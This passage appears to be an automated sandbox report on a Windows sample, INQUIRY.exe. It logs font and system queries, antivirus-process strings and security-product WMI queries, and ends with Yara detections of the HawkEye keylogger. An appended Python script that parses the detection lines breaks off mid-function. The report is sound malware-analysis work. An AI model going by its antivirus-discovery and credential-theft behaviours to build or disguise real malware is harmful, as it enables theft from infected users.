Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040697A GetSystemTime,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 5_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00441B28 GetVersion,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: INQUIRY.exe, 00000011.00000002.835872619.000000000019D000.00000004.00000010.sdmp Binary or memory string: avp.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmp Binary or memory string: r\MsMpeng.exe
                    Source: INQUIRY.exe, 00000010.00000002.825678890.00000000008CC000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\INQUIRY.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    Yara detected HawkEye Keylogger
                    Source: Yara match, File source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara match, File source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara match, File source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara match, File source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara match, File source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
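                    The Yara match entries above name their evidence with Joe Sandbox dump identifiers such as 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, which is awkward to triage by eye across dozens of lines. The following Python script is an added example (it is not part of the report and not Joe Sandbox's own tooling) that parses those lines into per-process records and flags every dumped region whose page protection is PAGE_EXECUTE_READWRITE. The field layout it assumes for .sdmp names (process index, dump stage, dump id, base address, page protection, region type; all hexadecimal except the dump id) and for .unpack names (process index, stage, image, base, region index, optional raw marker) is the editor's reading of the naming scheme and is marked as an assumption in the code; the sample lines are copied from the lists above.

```python
"""Parse Joe Sandbox 'Yara match' source lines into per-process records.

Added example for this report page; it is not Joe Sandbox code. The field
layouts below are the editor's reading of the dump naming scheme (assumption):
  <proc-index>.<stage>.<dump-id>.<base>.<protect>.<type>.sdmp   (hex except dump-id)
  <proc-index>.<stage>.<image>.<base>.<region>[.raw].unpack
"""
import re
from collections import defaultdict

# Constructed sample: lines copied from the Yara match lists in this report.
SAMPLE_LINES = [
    "Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY",
    r"Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED",
    "Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE",
]

# Tolerates both the fused "matchFile source" extraction and the clean form.
LINE_RE = re.compile(r"File source:\s*(?P<src>.+?),\s*type:\s*(?P<kind>\w+)\s*$")
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<mtype>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-f]+)\."
    r"(?P<region>\d+)(?P<raw>\.raw)?\.unpack$",
    re.IGNORECASE,
)
PIDSPACE_RE = re.compile(r"^Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+)$")

# Win32 PAGE_* constants; the base protection lives in the low byte.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXECUTE_READWRITE = 0x40


def protect_name(value):
    """Name the base page protection; unknown values come back as hex."""
    return PAGE_PROTECT.get(value & 0xFF, hex(value))


def parse_source(line):
    """Return a dict for one 'Yara match' line, or None if the line is something else."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    src, kind = m.group("src"), m.group("kind")
    rec = {"kind": kind, "raw": src}
    d = SDMP_RE.match(src)
    if d:
        rec.update(form="sdmp", proc=int(d["proc"], 16), stage=int(d["stage"], 16),
                   dump=int(d["dump"]), base=int(d["base"], 16),
                   protect=int(d["protect"], 16), mtype=int(d["mtype"], 16))
        return rec
    u = UNPACK_RE.match(src)
    if u:
        rec.update(form="unpack", proc=int(u["proc"]), stage=int(u["stage"]),
                   image=u["image"], base=int(u["base"], 16),
                   region=int(u["region"]), is_raw=u["raw"] is not None)
        return rec
    p = PIDSPACE_RE.match(src)
    if p:
        rec.update(form="pidspace", image=p["image"], pid=int(p["pid"]))
        return rec
    rec["form"] = "file"  # a dropped file on disk, e.g. a WER minidump
    return rec


def summarize(lines):
    """Group records by sandbox process index.

    Returns {proc_index: {"dumps": n, "rwx": [bases], "unpacked": [(image, base, is_raw)]}}.
    """
    out = defaultdict(lambda: {"dumps": 0, "rwx": [], "unpacked": []})
    for line in lines:
        rec = parse_source(line)
        if rec is None or "proc" not in rec:
            continue  # file drops and PID-space hits carry no process index
        entry = out[rec["proc"]]
        if rec["form"] == "sdmp":
            entry["dumps"] += 1
            if rec["protect"] & 0xFF == PAGE_EXECUTE_READWRITE:
                entry["rwx"].append(rec["base"])
        else:
            entry["unpacked"].append((rec["image"], rec["base"], rec["is_raw"]))
    return dict(out)


def rwx_regions(lines):
    """(proc_index, base) for every dumped region that is readable, writable and executable."""
    hits = []
    for line in lines:
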